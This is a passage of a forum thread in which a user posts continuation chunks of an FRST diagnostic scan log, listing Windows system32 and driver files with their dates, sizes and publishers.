2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgentTask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\prflbmsg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\GameBarPresenceWriter.proxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Eap3Host.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\registry.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dabapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_ISCII.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013968 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrss.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundPlayback.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsUsbRedirectionGroupPolicyExtension.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TetheringIeProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\TapiSysprep.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonUI.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LAPRXY.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\InfDefaultInstall.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\dstokenclean.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\dllhst3g.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clrhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSHTCPIP.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletBackgroundServiceProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\txfw32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\TCPSVCS.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\netwphelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUxRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\acproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00013091 _____ C:\WINDOWS\system32\DevModeRunAsUserConfig.msc
2016-12-03 08:34 - 2016-12-03 08:34 - 00013072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_07_1415.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012876 _____ C:\WINDOWS\system32\korean.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wship6.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapiperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemotePosWorker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdiagnostics.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiwer.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\msidle.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsied.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dvdplay.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mstee.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefaultDeviceManager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfoext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwizres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet_uart16550.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshhyperv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PerceptionSimulation.ProxyStubs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiaExtensionHost64.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeDateMUICallback.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\spnet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\regedt32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscat32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MinstoreEvents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-battery-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\help.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mshidumdf.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomcnfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\write.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapihost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\write.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WppRecorderUM.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\systray.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\spmpm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SEMgrSvcPAL.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Locator.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\getuname.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\acledit.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011536 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011392 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumdll.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\XInput9_1_0.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\softpub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\shfolder.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\plasrv.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Nlsdl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmcodecdspps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebCache.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcNs4.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\OskSupport.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssip32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnecat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\idndl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mspqm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mspclock.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe

Offline Ozzie

Re: File Type Question
« Reply #32 on: January 25, 2017, 08:58:10 PM »
18th continuation of FRST

2016-12-03 08:33 - 2016-12-03 08:33 - 00558864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00537360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00529680 _____ (QLogic Corporation) C:\WINDOWS\system32\Drivers\bxvbda.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00522000 _____ (Mellanox) C:\WINDOWS\system32\Drivers\ibbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00502544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthHFSrv.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00455440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00407824 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaStorV.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysFxUI.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00380688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00342800 _____ (Chelsio Communications) C:\WINDOWS\system32\Drivers\cht4sx64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00340240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00301328 _____ (VIA Corporation) C:\WINDOWS\system32\Drivers\VSTXRAID.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00279824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00273680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00266000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mausbhost.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00264704 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDScDrv.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00255248 _____ (AMD Technologies Inc.) C:\WINDOWS\system32\Drivers\amdsbs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\1394ohci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpdMtp.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00208656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00187664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ataport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00185104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rfcomm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00176384 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS2i_I2C.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00173056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cdrom.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00165136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162576 _____ (VIA Technologies Inc.,Ltd) C:\WINDOWS\system32\Drivers\vsmraid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpdMtpUS.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00146192 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvraid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00133392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufxsynopsys.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00130320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00127760 _____ (PMC-Sierra, Inc.) C:\WINDOWS\system32\Drivers\arcsas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00126224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\capimg.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00119568 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sas2i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pcmcia.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113152 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSSi_I2C.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00105744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sbp2port.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00104720 _____ (Mellanox) C:\WINDOWS\system32\Drivers\ndfltr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00104720 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00103184 _____ (LSI) C:\WINDOWS\system32\Drivers\3ware.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbcir.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00101136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00099088 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\lsi_sas3i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00098576 _____ (Chelsio Communications) C:\WINDOWS\system32\Drivers\cht4dx64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pmem.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00097552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\disk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\parport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\drmk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00093456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UfxChipidea.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00087312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scmbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00085776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00083216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00081408 _____ (Intel(R) Corporation) C:\WINDOWS\system32\Drivers\iai2c.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00079120 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdsata.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00078608 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sss.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00077584 _____ (Silicon Integrated Systems) C:\WINDOWS\system32\Drivers\sisraid4.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00075536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00074000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\uaspstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00069904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthmodem.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00064512 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS2i_GPIO2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Synth3dVsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060688 _____ (Mellanox) C:\WINDOWS\system32\Drivers\winverbs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060176 _____ (Hewlett-Packard Company) C:\WINDOWS\system32\Drivers\HpSAMD.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060176 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00059664 _____ (Marvell Semiconductor, Inc.) C:\WINDOWS\system32\Drivers\mvumis.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00058640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00057616 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\percsas3i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\umbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicDisplay.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00055568 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\megasas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00054544 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\percsas2i.sys

Offline Ozzie

Re: File Type Question
« Reply #33 on: January 25, 2017, 08:59:28 PM »
19th continuation of FRST

2016-12-03 08:33 - 2016-12-03 08:33 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidi2c.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00049424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vdrvroot.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00048912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciidex.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\circlass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidir.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpiowin32.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mausbip.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidinterrupt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dmvsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\devauthe.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00044352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthAvrcpTg.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00042768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmstorfl.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsUsbGDCoInstaller.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidparse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040720 _____ (Silicon Integrated Systems Corp.) C:\WINDOWS\system32\Drivers\sisraid2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\RfxVmt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mssmbios.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\monitor.sys
